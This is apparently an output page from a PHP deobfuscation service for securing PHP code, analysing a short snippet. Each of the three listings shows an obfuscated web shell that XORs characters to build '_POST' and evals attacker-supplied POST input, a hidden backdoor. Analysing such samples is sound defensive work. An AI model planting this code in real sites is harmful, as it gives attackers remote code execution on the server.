Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @$_++; $__=("#"^"|"); $__.=("."^"~"); $__.=("/"^"`"); $__.=("|"^"/"); $__..

Decoded Output download

<?php 
@$_++;  
$__=("#"^"|");  
$__.=("."^"~");  
$__.=("/"^"`");  
$__.=("|"^"/");  
$__.=("{"^"/");  
@eval(${$__}[!$_]); 
?>

Did this file decode correctly?

Original Code

<?php
@$_++; 
$__=("#"^"|"); 
$__.=("."^"~"); 
$__.=("/"^"`"); 
$__.=("|"^"/"); 
$__.=("{"^"/"); 
@eval(${$__}[!$_]);
?>

Function Calls

None

Variables

None

Stats

MD5 7d889054e870f8d00202eb9ae269045f
Eval Count 0
Decode Time 252 ms